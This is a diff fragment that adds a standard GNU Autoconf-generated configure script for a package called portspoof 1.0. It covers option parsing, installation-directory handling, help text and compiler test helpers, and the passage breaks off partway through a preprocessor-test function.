+#include +#ifdef HAVE_SYS_TYPES_H +# include +#endif +#ifdef HAVE_SYS_STAT_H +# include +#endif +#ifdef STDC_HEADERS +# include +# include +#else +# ifdef HAVE_STDLIB_H +# include +# endif +#endif +#ifdef HAVE_STRING_H +# if !defined STDC_HEADERS && defined HAVE_MEMORY_H +# include +# endif +# include +#endif +#ifdef HAVE_STRINGS_H +# include +#endif +#ifdef HAVE_INTTYPES_H +# include +#endif +#ifdef HAVE_STDINT_H +# include +#endif +#ifdef HAVE_UNISTD_H +# include +#endif" + +ac_subst_vars='am__EXEEXT_FALSE +am__EXEEXT_TRUE +LTLIBOBJS +LIB@&t@OBJS +EGREP +GREP +CPP +am__fastdepCC_FALSE +am__fastdepCC_TRUE +CCDEPMODE +ac_ct_CC +CFLAGS +CC +am__fastdepCXX_FALSE +am__fastdepCXX_TRUE +CXXDEPMODE +AMDEPBACKSLASH +AMDEP_FALSE +AMDEP_TRUE +am__quote +am__include +DEPDIR +OBJEXT +EXEEXT +ac_ct_CXX +CPPFLAGS +LDFLAGS +CXXFLAGS +CXX +host_os +host_vendor +host_cpu +host +build_os +build_vendor +build_cpu +build +am__untar +am__tar +AMTAR +am__leading_dot +SET_MAKE +AWK +mkdir_p +MKDIR_P +INSTALL_STRIP_PROGRAM +STRIP +install_sh +MAKEINFO +AUTOHEADER +AUTOMAKE +AUTOCONF +ACLOCAL +VERSION +PACKAGE +CYGPATH_W +am__isrc +INSTALL_DATA +INSTALL_SCRIPT +INSTALL_PROGRAM +target_alias +host_alias +build_alias +LIBS +ECHO_T +ECHO_N +ECHO_C +DEFS +mandir +localedir +libdir +psdir +pdfdir +dvidir +htmldir +infodir +docdir +oldincludedir +includedir +localstatedir +sharedstatedir +sysconfdir +datadir +datarootdir +libexecdir +sbindir +bindir +program_transform_name +prefix +exec_prefix +PACKAGE_URL +PACKAGE_BUGREPORT +PACKAGE_STRING +PACKAGE_VERSION +PACKAGE_TARNAME +PACKAGE_NAME +PATH_SEPARATOR +SHELL' +ac_subst_files='' +ac_user_opts=' +enable_option_checking +enable_dependency_tracking +' + ac_precious_vars='build_alias +host_alias +target_alias +CXX +CXXFLAGS +LDFLAGS +LIBS +CPPFLAGS +CCC +CC +CFLAGS +CPP' + + +# Initialize some variables set by options. +ac_init_help= +ac_init_version=false +ac_unrecognized_opts= +ac_unrecognized_sep= +# The variables have the same names as the options, with +# dashes changed to underlines. +cache_file=/dev/null +exec_prefix=NONE +no_create= +no_recursion= +prefix=NONE +program_prefix=NONE +program_suffix=NONE +program_transform_name=s,x,x, +silent= +site= +srcdir= +verbose= +x_includes=NONE +x_libraries=NONE + +# Installation directory options. +# These are left unexpanded so users can "make install exec_prefix=/foo" +# and all the variables that are supposed to be based on exec_prefix +# by default will actually change. +# Use braces instead of parens because sh, perl, etc. also accept them. +# (The list follows the same order as the GNU Coding Standards.) +bindir='${exec_prefix}/bin' +sbindir='${exec_prefix}/sbin' +libexecdir='${exec_prefix}/libexec' +datarootdir='${prefix}/share' +datadir='${datarootdir}' +sysconfdir='${prefix}/etc' +sharedstatedir='${prefix}/com' +localstatedir='${prefix}/var' +includedir='${prefix}/include' +oldincludedir='/usr/include' +docdir='${datarootdir}/doc/${PACKAGE_TARNAME}' +infodir='${datarootdir}/info' +htmldir='${docdir}' +dvidir='${docdir}' +pdfdir='${docdir}' +psdir='${docdir}' +libdir='${exec_prefix}/lib' +localedir='${datarootdir}/locale' +mandir='${datarootdir}/man' + +ac_prev= +ac_dashdash= +for ac_option +do + # If the previous option needs an argument, assign it. + if test -n "$ac_prev"; then + eval $ac_prev=\$ac_option + ac_prev= + continue + fi + + case $ac_option in + *=*) ac_optarg=`expr "X$ac_option" : '[^=]*=\(.*\)'` ;; + *) ac_optarg=yes ;; + esac + + # Accept the important Cygnus configure options, so we can diagnose typos. + + case $ac_dashdash$ac_option in + --) + ac_dashdash=yes ;; + + -bindir | --bindir | --bindi | --bind | --bin | --bi) + ac_prev=bindir ;; + -bindir=* | --bindir=* | --bindi=* | --bind=* | --bin=* | --bi=*) + bindir=$ac_optarg ;; + + -build | --build | --buil | --bui | --bu) + ac_prev=build_alias ;; + -build=* | --build=* | --buil=* | --bui=* | --bu=*) + build_alias=$ac_optarg ;; + + -cache-file | --cache-file | --cache-fil | --cache-fi \ + | --cache-f | --cache- | --cache | --cach | --cac | --ca | --c) + ac_prev=cache_file ;; + -cache-file=* | --cache-file=* | --cache-fil=* | --cache-fi=* \ + | --cache-f=* | --cache-=* | --cache=* | --cach=* | --cac=* | --ca=* | --c=*) + cache_file=$ac_optarg ;; + + --config-cache | -C) + cache_file=config.cache ;; + + -datadir | --datadir | --datadi | --datad) + ac_prev=datadir ;; + -datadir=* | --datadir=* | --datadi=* | --datad=*) + datadir=$ac_optarg ;; + + -datarootdir | --datarootdir | --datarootdi | --datarootd | --dataroot \ + | --dataroo | --dataro | --datar) + ac_prev=datarootdir ;; + -datarootdir=* | --datarootdir=* | --datarootdi=* | --datarootd=* \ + | --dataroot=* | --dataroo=* | --dataro=* | --datar=*) + datarootdir=$ac_optarg ;; + + -disable-* | --disable-*) + ac_useropt=`expr "x$ac_option" : 'x-*disable-\(.*\)'` + # Reject names that are not valid shell variable names. + expr "x$ac_useropt" : ".*[^-+._$as_cr_alnum]" >/dev/null && + as_fn_error "invalid feature name: $ac_useropt" + ac_useropt_orig=$ac_useropt + ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'` + case $ac_user_opts in + *" +"enable_$ac_useropt" +"*) ;; + *) ac_unrecognized_opts="$ac_unrecognized_opts$ac_unrecognized_sep--disable-$ac_useropt_orig" + ac_unrecognized_sep=', ';; + esac + eval enable_$ac_useropt=no ;; + + -docdir | --docdir | --docdi | --doc | --do) + ac_prev=docdir ;; + -docdir=* | --docdir=* | --docdi=* | --doc=* | --do=*) + docdir=$ac_optarg ;; + + -dvidir | --dvidir | --dvidi | --dvid | --dvi | --dv) + ac_prev=dvidir ;; + -dvidir=* | --dvidir=* | --dvidi=* | --dvid=* | --dvi=* | --dv=*) + dvidir=$ac_optarg ;; + + -enable-* | --enable-*) + ac_useropt=`expr "x$ac_option" : 'x-*enable-\([^=]*\)'` + # Reject names that are not valid shell variable names. + expr "x$ac_useropt" : ".*[^-+._$as_cr_alnum]" >/dev/null && + as_fn_error "invalid feature name: $ac_useropt" + ac_useropt_orig=$ac_useropt + ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'` + case $ac_user_opts in + *" +"enable_$ac_useropt" +"*) ;; + *) ac_unrecognized_opts="$ac_unrecognized_opts$ac_unrecognized_sep--enable-$ac_useropt_orig" + ac_unrecognized_sep=', ';; + esac + eval enable_$ac_useropt=\$ac_optarg ;; + + -exec-prefix | --exec_prefix | --exec-prefix | --exec-prefi \ + | --exec-pref | --exec-pre | --exec-pr | --exec-p | --exec- \ + | --exec | --exe | --ex) + ac_prev=exec_prefix ;; + -exec-prefix=* | --exec_prefix=* | --exec-prefix=* | --exec-prefi=* \ + | --exec-pref=* | --exec-pre=* | --exec-pr=* | --exec-p=* | --exec-=* \ + | --exec=* | --exe=* | --ex=*) + exec_prefix=$ac_optarg ;; + + -gas | --gas | --ga | --g) + # Obsolete; use --with-gas. + with_gas=yes ;; + + -help | --help | --hel | --he | -h) + ac_init_help=long ;; + -help=r* | --help=r* | --hel=r* | --he=r* | -hr*) + ac_init_help=recursive ;; + -help=s* | --help=s* | --hel=s* | --he=s* | -hs*) + ac_init_help=short ;; + + -host | --host | --hos | --ho) + ac_prev=host_alias ;; + -host=* | --host=* | --hos=* | --ho=*) + host_alias=$ac_optarg ;; + + -htmldir | --htmldir | --htmldi | --htmld | --html | --htm | --ht) + ac_prev=htmldir ;; + -htmldir=* | --htmldir=* | --htmldi=* | --htmld=* | --html=* | --htm=* \ + | --ht=*) + htmldir=$ac_optarg ;; + + -includedir | --includedir | --includedi | --included | --include \ + | --includ | --inclu | --incl | --inc) + ac_prev=includedir ;; + -includedir=* | --includedir=* | --includedi=* | --included=* | --include=* \ + | --includ=* | --inclu=* | --incl=* | --inc=*) + includedir=$ac_optarg ;; + + -infodir | --infodir | --infodi | --infod | --info | --inf) + ac_prev=infodir ;; + -infodir=* | --infodir=* | --infodi=* | --infod=* | --info=* | --inf=*) + infodir=$ac_optarg ;; + + -libdir | --libdir | --libdi | --libd) + ac_prev=libdir ;; + -libdir=* | --libdir=* | --libdi=* | --libd=*) + libdir=$ac_optarg ;; + + -libexecdir | --libexecdir | --libexecdi | --libexecd | --libexec \ + | --libexe | --libex | --libe) + ac_prev=libexecdir ;; + -libexecdir=* | --libexecdir=* | --libexecdi=* | --libexecd=* | --libexec=* \ + | --libexe=* | --libex=* | --libe=*) + libexecdir=$ac_optarg ;; + + -localedir | --localedir | --localedi | --localed | --locale) + ac_prev=localedir ;; + -localedir=* | --localedir=* | --localedi=* | --localed=* | --locale=*) + localedir=$ac_optarg ;; + + -localstatedir | --localstatedir | --localstatedi | --localstated \ + | --localstate | --localstat | --localsta | --localst | --locals) + ac_prev=localstatedir ;; + -localstatedir=* | --localstatedir=* | --localstatedi=* | --localstated=* \ + | --localstate=* | --localstat=* | --localsta=* | --localst=* | --locals=*) + localstatedir=$ac_optarg ;; + + -mandir | --mandir | --mandi | --mand | --man | --ma | --m) + ac_prev=mandir ;; + -mandir=* | --mandir=* | --mandi=* | --mand=* | --man=* | --ma=* | --m=*) + mandir=$ac_optarg ;; + + -nfp | --nfp | --nf) + # Obsolete; use --without-fp. + with_fp=no ;; + + -no-create | --no-create | --no-creat | --no-crea | --no-cre \ + | --no-cr | --no-c | -n) + no_create=yes ;; + + -no-recursion | --no-recursion | --no-recursio | --no-recursi \ + | --no-recurs | --no-recur | --no-recu | --no-rec | --no-re | --no-r) + no_recursion=yes ;; + + -oldincludedir | --oldincludedir | --oldincludedi | --oldincluded \ + | --oldinclude | --oldinclud | --oldinclu | --oldincl | --oldinc \ + | --oldin | --oldi | --old | --ol | --o) + ac_prev=oldincludedir ;; + -oldincludedir=* | --oldincludedir=* | --oldincludedi=* | --oldincluded=* \ + | --oldinclude=* | --oldinclud=* | --oldinclu=* | --oldincl=* | --oldinc=* \ + | --oldin=* | --oldi=* | --old=* | --ol=* | --o=*) + oldincludedir=$ac_optarg ;; + + -prefix | --prefix | --prefi | --pref | --pre | --pr | --p) + ac_prev=prefix ;; + -prefix=* | --prefix=* | --prefi=* | --pref=* | --pre=* | --pr=* | --p=*) + prefix=$ac_optarg ;; + + -program-prefix | --program-prefix | --program-prefi | --program-pref \ + | --program-pre | --program-pr | --program-p) + ac_prev=program_prefix ;; + -program-prefix=* | --program-prefix=* | --program-prefi=* \ + | --program-pref=* | --program-pre=* | --program-pr=* | --program-p=*) + program_prefix=$ac_optarg ;; + + -program-suffix | --program-suffix | --program-suffi | --program-suff \ + | --program-suf | --program-su | --program-s) + ac_prev=program_suffix ;; + -program-suffix=* | --program-suffix=* | --program-suffi=* \ + | --program-suff=* | --program-suf=* | --program-su=* | --program-s=*) + program_suffix=$ac_optarg ;; + + -program-transform-name | --program-transform-name \ + | --program-transform-nam | --program-transform-na \ + | --program-transform-n | --program-transform- \ + | --program-transform | --program-transfor \ + | --program-transfo | --program-transf \ + | --program-trans | --program-tran \ + | --progr-tra | --program-tr | --program-t) + ac_prev=program_transform_name ;; + -program-transform-name=* | --program-transform-name=* \ + | --program-transform-nam=* | --program-transform-na=* \ + | --program-transform-n=* | --program-transform-=* \ + | --program-transform=* | --program-transfor=* \ + | --program-transfo=* | --program-transf=* \ + | --program-trans=* | --program-tran=* \ + | --progr-tra=* | --program-tr=* | --program-t=*) + program_transform_name=$ac_optarg ;; + + -pdfdir | --pdfdir | --pdfdi | --pdfd | --pdf | --pd) + ac_prev=pdfdir ;; + -pdfdir=* | --pdfdir=* | --pdfdi=* | --pdfd=* | --pdf=* | --pd=*) + pdfdir=$ac_optarg ;; + + -psdir | --psdir | --psdi | --psd | --ps) + ac_prev=psdir ;; + -psdir=* | --psdir=* | --psdi=* | --psd=* | --ps=*) + psdir=$ac_optarg ;; + + -q | -quiet | --quiet | --quie | --qui | --qu | --q \ + | -silent | --silent | --silen | --sile | --sil) + silent=yes ;; + + -sbindir | --sbindir | --sbindi | --sbind | --sbin | --sbi | --sb) + ac_prev=sbindir ;; + -sbindir=* | --sbindir=* | --sbindi=* | --sbind=* | --sbin=* \ + | --sbi=* | --sb=*) + sbindir=$ac_optarg ;; + + -sharedstatedir | --sharedstatedir | --sharedstatedi \ + | --sharedstated | --sharedstate | --sharedstat | --sharedsta \ + | --sharedst | --shareds | --shared | --share | --shar \ + | --sha | --sh) + ac_prev=sharedstatedir ;; + -sharedstatedir=* | --sharedstatedir=* | --sharedstatedi=* \ + | --sharedstated=* | --sharedstate=* | --sharedstat=* | --sharedsta=* \ + | --sharedst=* | --shareds=* | --shared=* | --share=* | --shar=* \ + | --sha=* | --sh=*) + sharedstatedir=$ac_optarg ;; + + -site | --site | --sit) + ac_prev=site ;; + -site=* | --site=* | --sit=*) + site=$ac_optarg ;; + + -srcdir | --srcdir | --srcdi | --srcd | --src | --sr) + ac_prev=srcdir ;; + -srcdir=* | --srcdir=* | --srcdi=* | --srcd=* | --src=* | --sr=*) + srcdir=$ac_optarg ;; + + -sysconfdir | --sysconfdir | --sysconfdi | --sysconfd | --sysconf \ + | --syscon | --sysco | --sysc | --sys | --sy) + ac_prev=sysconfdir ;; + -sysconfdir=* | --sysconfdir=* | --sysconfdi=* | --sysconfd=* | --sysconf=* \ + | --syscon=* | --sysco=* | --sysc=* | --sys=* | --sy=*) + sysconfdir=$ac_optarg ;; + + -target | --target | --targe | --targ | --tar | --ta | --t) + ac_prev=target_alias ;; + -target=* | --target=* | --targe=* | --targ=* | --tar=* | --ta=* | --t=*) + target_alias=$ac_optarg ;; + + -v | -verbose | --verbose | --verbos | --verbo | --verb) + verbose=yes ;; + + -version | --version | --versio | --versi | --vers | -V) + ac_init_version=: ;; + + -with-* | --with-*) + ac_useropt=`expr "x$ac_option" : 'x-*with-\([^=]*\)'` + # Reject names that are not valid shell variable names. + expr "x$ac_useropt" : ".*[^-+._$as_cr_alnum]" >/dev/null && + as_fn_error "invalid package name: $ac_useropt" + ac_useropt_orig=$ac_useropt + ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'` + case $ac_user_opts in + *" +"with_$ac_useropt" +"*) ;; + *) ac_unrecognized_opts="$ac_unrecognized_opts$ac_unrecognized_sep--with-$ac_useropt_orig" + ac_unrecognized_sep=', ';; + esac + eval with_$ac_useropt=\$ac_optarg ;; + + -without-* | --without-*) + ac_useropt=`expr "x$ac_option" : 'x-*without-\(.*\)'` + # Reject names that are not valid shell variable names. + expr "x$ac_useropt" : ".*[^-+._$as_cr_alnum]" >/dev/null && + as_fn_error "invalid package name: $ac_useropt" + ac_useropt_orig=$ac_useropt + ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'` + case $ac_user_opts in + *" +"with_$ac_useropt" +"*) ;; + *) ac_unrecognized_opts="$ac_unrecognized_opts$ac_unrecognized_sep--without-$ac_useropt_orig" + ac_unrecognized_sep=', ';; + esac + eval with_$ac_useropt=no ;; + + --x) + # Obsolete; use --with-x. + with_x=yes ;; + + -x-includes | --x-includes | --x-include | --x-includ | --x-inclu \ + | --x-incl | --x-inc | --x-in | --x-i) + ac_prev=x_includes ;; + -x-includes=* | --x-includes=* | --x-include=* | --x-includ=* | --x-inclu=* \ + | --x-incl=* | --x-inc=* | --x-in=* | --x-i=*) + x_includes=$ac_optarg ;; + + -x-libraries | --x-libraries | --x-librarie | --x-librari \ + | --x-librar | --x-libra | --x-libr | --x-lib | --x-li | --x-l) + ac_prev=x_libraries ;; + -x-libraries=* | --x-libraries=* | --x-librarie=* | --x-librari=* \ + | --x-librar=* | --x-libra=* | --x-libr=* | --x-lib=* | --x-li=* | --x-l=*) + x_libraries=$ac_optarg ;; + + -*) as_fn_error "unrecognized option: \`$ac_option' +Try \`$0 --help' for more information." + ;; + + *=*) + ac_envvar=`expr "x$ac_option" : 'x\([^=]*\)='` + # Reject names that are not valid shell variable names. + case $ac_envvar in #( + '' | [0-9]* | *[!_$as_cr_alnum]* ) + as_fn_error "invalid variable name: \`$ac_envvar'" ;; + esac + eval $ac_envvar=\$ac_optarg + export $ac_envvar ;; + + *) + # FIXME: should be removed in autoconf 3.0. + $as_echo "$as_me: WARNING: you should use --build, --host, --target" >&2 + expr "x$ac_option" : ".*[^-._$as_cr_alnum]" >/dev/null && + $as_echo "$as_me: WARNING: invalid host type: $ac_option" >&2 + : ${build_alias=$ac_option} ${host_alias=$ac_option} ${target_alias=$ac_option} + ;; + + esac +done + +if test -n "$ac_prev"; then + ac_option=--`echo $ac_prev | sed 's/_/-/g'` + as_fn_error "missing argument to $ac_option" +fi + +if test -n "$ac_unrecognized_opts"; then + case $enable_option_checking in + no) ;; + fatal) as_fn_error "unrecognized options: $ac_unrecognized_opts" ;; + *) $as_echo "$as_me: WARNING: unrecognized options: $ac_unrecognized_opts" >&2 ;; + esac +fi + +# Check all directory arguments for consistency. +for ac_var in exec_prefix prefix bindir sbindir libexecdir datarootdir \ + datadir sysconfdir sharedstatedir localstatedir includedir \ + oldincludedir docdir infodir htmldir dvidir pdfdir psdir \ + libdir localedir mandir +do + eval ac_val=\$$ac_var + # Remove trailing slashes. + case $ac_val in + */ ) + ac_val=`expr "X$ac_val" : 'X\(.*[^/]\)' \| "X$ac_val" : 'X\(.*\)'` + eval $ac_var=\$ac_val;; + esac + # Be sure to have absolute directory names. + case $ac_val in + [\\/$]* | ?:[\\/]* ) continue;; + NONE | '' ) case $ac_var in *prefix ) continue;; esac;; + esac + as_fn_error "expected an absolute directory name for --$ac_var: $ac_val" +done + +# There might be people who depend on the old broken behavior: `$host' +# used to hold the argument of --host etc. +# FIXME: To remove some day. +build=$build_alias +host=$host_alias +target=$target_alias + +# FIXME: To remove some day. +if test "x$host_alias" != x; then + if test "x$build_alias" = x; then + cross_compiling=maybe + $as_echo "$as_me: WARNING: If you wanted to set the --build type, don't use --host. + If a cross compiler is detected then cross compile mode will be used." >&2 + elif test "x$build_alias" != "x$host_alias"; then + cross_compiling=yes + fi +fi + +ac_tool_prefix= +test -n "$host_alias" && ac_tool_prefix=$host_alias- + +test "$silent" = yes && exec 6>/dev/null + + +ac_pwd=`pwd` && test -n "$ac_pwd" && +ac_ls_di=`ls -di .` && +ac_pwd_ls_di=`cd "$ac_pwd" && ls -di .` || + as_fn_error "working directory cannot be determined" +test "X$ac_ls_di" = "X$ac_pwd_ls_di" || + as_fn_error "pwd does not report name of working directory" + + +# Find the source files, if location was not specified. +if test -z "$srcdir"; then + ac_srcdir_defaulted=yes + # Try the directory containing this script, then the parent directory. + ac_confdir=`$as_dirname -- "$as_myself" || +$as_expr X"$as_myself" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ + X"$as_myself" : 'X\(//\)[^/]' \| \ + X"$as_myself" : 'X\(//\)$' \| \ + X"$as_myself" : 'X\(/\)' \| . 2>/dev/null || +$as_echo X"$as_myself" | + sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ + s//\1/ + q + } + /^X\(\/\/\)[^/].*/{ + s//\1/ + q + } + /^X\(\/\/\)$/{ + s//\1/ + q + } + /^X\(\/\).*/{ + s//\1/ + q + } + s/.*/./; q'` + srcdir=$ac_confdir + if test ! -r "$srcdir/$ac_unique_file"; then + srcdir=.. + fi +else + ac_srcdir_defaulted=no +fi +if test ! -r "$srcdir/$ac_unique_file"; then + test "$ac_srcdir_defaulted" = yes && srcdir="$ac_confdir or .." + as_fn_error "cannot find sources ($ac_unique_file) in $srcdir" +fi +ac_msg="sources are in $srcdir, but \`cd $srcdir' does not work" +ac_abs_confdir=`( + cd "$srcdir" && test -r "./$ac_unique_file" || as_fn_error "$ac_msg" + pwd)` +# When building in place, set srcdir=. +if test "$ac_abs_confdir" = "$ac_pwd"; then + srcdir=. +fi +# Remove unnecessary trailing slashes from srcdir. +# Double slashes in file names in object file debugging info +# mess up M-x gdb in Emacs. +case $srcdir in +*/) srcdir=`expr "X$srcdir" : 'X\(.*[^/]\)' \| "X$srcdir" : 'X\(.*\)'`;; +esac +for ac_var in $ac_precious_vars; do + eval ac_env_${ac_var}_set=\${${ac_var}+set} + eval ac_env_${ac_var}_value=\$${ac_var} + eval ac_cv_env_${ac_var}_set=\${${ac_var}+set} + eval ac_cv_env_${ac_var}_value=\$${ac_var} +done + +# +# Report the --help message. +# +if test "$ac_init_help" = "long"; then + # Omit some internal or obsolete options to make the list less imposing. + # This message is too long to be a string in the A/UX 3.1 sh. + cat <<_ACEOF +\`configure' configures portspoof 1.0 to adapt to many kinds of systems. + +Usage: $0 [OPTION]... [VAR=VALUE]... + +To assign environment variables (e.g., CC, CFLAGS...), specify them as +VAR=VALUE. See below for descriptions of some of the useful variables. + +Defaults for the options are specified in brackets. + +Configuration: + -h, --help display this help and exit + --help=short display options specific to this package + --help=recursive display the short help of all the included packages + -V, --version display version information and exit + -q, --quiet, --silent do not print \`checking...' messages + --cache-file=FILE cache test results in FILE [disabled] + -C, --config-cache alias for \`--cache-file=config.cache' + -n, --no-create do not create output files + --srcdir=DIR find the sources in DIR [configure dir or \`..'] + +Installation directories: + --prefix=PREFIX install architecture-independent files in PREFIX + @<:@@S|@ac_default_prefix@:>@ + --exec-prefix=EPREFIX install architecture-dependent files in EPREFIX + @<:@PREFIX@:>@ + +By default, \`make install' will install all the files in +\`$ac_default_prefix/bin', \`$ac_default_prefix/lib' etc. You can specify +an installation prefix other than \`$ac_default_prefix' using \`--prefix', +for instance \`--prefix=\$HOME'. + +For better control, use the options below. + +Fine tuning of the installation directories: + --bindir=DIR user executables [EPREFIX/bin] + --sbindir=DIR system admin executables [EPREFIX/sbin] + --libexecdir=DIR program executables [EPREFIX/libexec] + --sysconfdir=DIR read-only single-machine data [PREFIX/etc] + --sharedstatedir=DIR modifiable architecture-independent data [PREFIX/com] + --localstatedir=DIR modifiable single-machine data [PREFIX/var] + --libdir=DIR object code libraries [EPREFIX/lib] + --includedir=DIR C header files [PREFIX/include] + --oldincludedir=DIR C header files for non-gcc [/usr/include] + --datarootdir=DIR read-only arch.-independent data root [PREFIX/share] + --datadir=DIR read-only architecture-independent data [DATAROOTDIR] + --infodir=DIR info documentation [DATAROOTDIR/info] + --localedir=DIR locale-dependent data [DATAROOTDIR/locale] + --mandir=DIR man documentation [DATAROOTDIR/man] + --docdir=DIR documentation root @<:@DATAROOTDIR/doc/portspoof@:>@ + --htmldir=DIR html documentation [DOCDIR] + --dvidir=DIR dvi documentation [DOCDIR] + --pdfdir=DIR pdf documentation [DOCDIR] + --psdir=DIR ps documentation [DOCDIR] +_ACEOF + + cat <<\_ACEOF + +Program names: + --program-prefix=PREFIX prepend PREFIX to installed program names + --program-suffix=SUFFIX append SUFFIX to installed program names + --program-transform-name=PROGRAM run sed PROGRAM on installed program names + +System types: + --build=BUILD configure for building on BUILD [guessed] + --host=HOST cross-compile to build programs to run on HOST [BUILD] +_ACEOF +fi + +if test -n "$ac_init_help"; then + case $ac_init_help in + short | recursive ) echo "Configuration of portspoof 1.0:";; + esac + cat <<\_ACEOF + +Optional Features: + --disable-option-checking ignore unrecognized --enable/--with options + --disable-FEATURE do not include FEATURE (same as --enable-FEATURE=no) + --enable-FEATURE[=ARG] include FEATURE [ARG=yes] + --disable-dependency-tracking speeds up one-time build + --enable-dependency-tracking do not reject slow dependency extractors + +Some influential environment variables: + CXX C++ compiler command + CXXFLAGS C++ compiler flags + LDFLAGS linker flags, e.g. -L if you have libraries in a + nonstandard directory + LIBS libraries to pass to the linker, e.g. -l + CPPFLAGS (Objective) C/C++ preprocessor flags, e.g. -I if + you have headers in a nonstandard directory + CC C compiler command + CFLAGS C compiler flags + CPP C preprocessor + +Use these variables to override the choices made by `configure' or to help +it to find libraries and programs with nonstandard names/locations. + +Report bugs to . +_ACEOF +ac_status=$? +fi + +if test "$ac_init_help" = "recursive"; then + # If there are subdirs, report their specific --help. + for ac_dir in : $ac_subdirs_all; do test "x$ac_dir" = x: && continue + test -d "$ac_dir" || + { cd "$srcdir" && ac_pwd=`pwd` && srcdir=. && test -d "$ac_dir"; } || + continue + ac_builddir=. + +case "$ac_dir" in +.) ac_dir_suffix= ac_top_builddir_sub=. ac_top_build_prefix= ;; +*) + ac_dir_suffix=/`$as_echo "$ac_dir" | sed 's|^\.[\\/]||'` + # A ".." for each directory in $ac_dir_suffix. + ac_top_builddir_sub=`$as_echo "$ac_dir_suffix" | sed 's|/[^\\/]*|/..|g;s|/||'` + case $ac_top_builddir_sub in + "") ac_top_builddir_sub=. ac_top_build_prefix= ;; + *) ac_top_build_prefix=$ac_top_builddir_sub/ ;; + esac ;; +esac +ac_abs_top_builddir=$ac_pwd +ac_abs_builddir=$ac_pwd$ac_dir_suffix +# for backward compatibility: +ac_top_builddir=$ac_top_build_prefix + +case $srcdir in + .) # We are building in place. + ac_srcdir=. + ac_top_srcdir=$ac_top_builddir_sub + ac_abs_top_srcdir=$ac_pwd ;; + [\\/]* | ?:[\\/]* ) # Absolute name. + ac_srcdir=$srcdir$ac_dir_suffix; + ac_top_srcdir=$srcdir + ac_abs_top_srcdir=$srcdir ;; + *) # Relative name. + ac_srcdir=$ac_top_build_prefix$srcdir$ac_dir_suffix + ac_top_srcdir=$ac_top_build_prefix$srcdir + ac_abs_top_srcdir=$ac_pwd/$srcdir ;; +esac +ac_abs_srcdir=$ac_abs_top_srcdir$ac_dir_suffix + + cd "$ac_dir" || { ac_status=$?; continue; } + # Check for guested configure. + if test -f "$ac_srcdir/configure.gnu"; then + echo && + $SHELL "$ac_srcdir/configure.gnu" --help=recursive + elif test -f "$ac_srcdir/configure"; then + echo && + $SHELL "$ac_srcdir/configure" --help=recursive + else + $as_echo "$as_me: WARNING: no configuration information is in $ac_dir" >&2 + fi || ac_status=$? + cd "$ac_pwd" || { ac_status=$?; break; } + done +fi + +test -n "$ac_init_help" && exit $ac_status +if $ac_init_version; then + cat <<\_ACEOF +portspoof configure 1.0 +generated by GNU Autoconf 2.65 + +Copyright (C) 2009 Free Software Foundation, Inc. +This configure script is free software; the Free Software Foundation +gives unlimited permission to copy, distribute and modify it. +_ACEOF + exit +fi + +## ------------------------ ## +## Autoconf initialization. ## +## ------------------------ ## + +@%:@ ac_fn_cxx_try_compile LINENO +@%:@ ---------------------------- +@%:@ Try to compile conftest.@S|@ac_ext, and return whether this succeeded. +ac_fn_cxx_try_compile () +{ + as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack + rm -f conftest.$ac_objext + if { { ac_try="$ac_compile" +case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_compile") 2>conftest.err + ac_status=$? + if test -s conftest.err; then + grep -v '^ *+' conftest.err >conftest.er1 + cat conftest.er1 >&5 + mv -f conftest.er1 conftest.err + fi + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; } && { + test -z "$ac_cxx_werror_flag" || + test ! -s conftest.err + } && test -s conftest.$ac_objext; then : + ac_retval=0 +else + $as_echo "$as_me: failed program was:" >&5 +sed 's/^/| /' conftest.$ac_ext >&5 + + ac_retval=1 +fi + eval $as_lineno_stack; test "x$as_lineno_stack" = x && { as_lineno=; unset as_lineno;} + as_fn_set_status $ac_retval + +} @%:@ ac_fn_cxx_try_compile + +@%:@ ac_fn_c_try_compile LINENO +@%:@ -------------------------- +@%:@ Try to compile conftest.@S|@ac_ext, and return whether this succeeded. +ac_fn_c_try_compile () +{ + as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack + rm -f conftest.$ac_objext + if { { ac_try="$ac_compile" +case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_compile") 2>conftest.err + ac_status=$? + if test -s conftest.err; then + grep -v '^ *+' conftest.err >conftest.er1 + cat conftest.er1 >&5 + mv -f conftest.er1 conftest.err + fi + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; } && { + test -z "$ac_c_werror_flag" || + test ! -s conftest.err + } && test -s conftest.$ac_objext; then : + ac_retval=0 +else + $as_echo "$as_me: failed program was:" >&5 +sed 's/^/| /' conftest.$ac_ext >&5 + + ac_retval=1 +fi + eval $as_lineno_stack; test "x$as_lineno_stack" = x && { as_lineno=; unset as_lineno;} + as_fn_set_status $ac_retval + +} @%:@ ac_fn_c_try_compile + +@%:@ ac_fn_c_try_cpp LINENO +@%:@ ---------------------- +@%:@ Try to preprocess conftest.@S|@ac_ext, and return whether this succeeded. +ac_fn_c_try_cpp () +{ + as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack + if { { ac_try="$ac_cpp conftest.$ac_ext" +case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_cpp conftest.$ac_ext") 2>conftest.err + ac_status=$? + if test -s conftest.err; then + grep -v '^ *+' conftest.err >conftest.er1 + cat conftest.er1 >&5 + 